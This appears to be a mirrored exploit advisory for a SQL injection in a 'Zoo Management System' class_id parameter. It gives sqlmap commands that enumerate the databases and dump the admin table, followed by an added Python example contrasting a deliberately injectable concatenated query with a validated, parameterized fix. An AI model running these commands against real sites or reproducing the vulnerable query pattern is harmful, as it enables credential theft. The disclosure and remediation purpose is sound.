## https://sploitus.com/exploit?id=PACKETSTORM:166648
# Zoo Management System SQL Injection  
# Author: D4rkP0w4r   
* Description => SQL injection at /animals?class_id=1  
* Injection Point  
  
http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1  
  
# Exploit   
* Exploit with Sqlmap  
python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --dbs  
  
python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --tables -D zoomanagement  
  
python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --columns -D zoomanagement -T admin --dump  
  
# Vulnerable Code  
  
* `class_id` is not filtered when inserting data into the database
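
The missing filter described above, shown next to a corrected form. This is an added example, not code from the application or the advisory: the application's source and schema are not shown on the page, so Python with an in-memory SQLite database, the `animals` table layout, and all function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in schema and rows (not the application's real tables)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE animals (id INTEGER PRIMARY KEY, name TEXT, class_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO animals (name, class_id) VALUES (?, ?)",
        [("lion", 1), ("tiger", 1), ("eagle", 2), ("python", 3)],
    )
    return conn

def animals_unfiltered(conn, class_id):
    """'Before' pattern: the request value is pasted into the SQL text."""
    sql = "SELECT name FROM animals WHERE class_id = " + class_id + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def parse_class_id(raw):
    """Accept only a short run of ASCII digits; reject everything else."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("class_id must be a non-negative integer")
    return int(raw)

def animals_filtered(conn, raw_class_id):
    """'After' pattern: validate the type, then bind the value as a parameter."""
    class_id = parse_class_id(raw_class_id)
    sql = "SELECT name FROM animals WHERE class_id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (class_id,))]

if __name__ == "__main__":
    conn = make_db()
    crafted = "1 OR 1=1"  # constructed non-integer input
    # Unfiltered: the value changes the WHERE clause, so every row comes back.
    print(animals_unfiltered(conn, crafted))
    # Filtered: a numeric value works, anything else is rejected before the query.
    print(animals_filtered(conn, "1"))
    try:
        animals_filtered(conn, crafted)
    except ValueError as exc:
        print("rejected:", exc)
```

Either control alone closes this particular hole; using both keeps the query safe if the validation is later loosened, and gives the handler a clean place to return a 400 and log the rejected value.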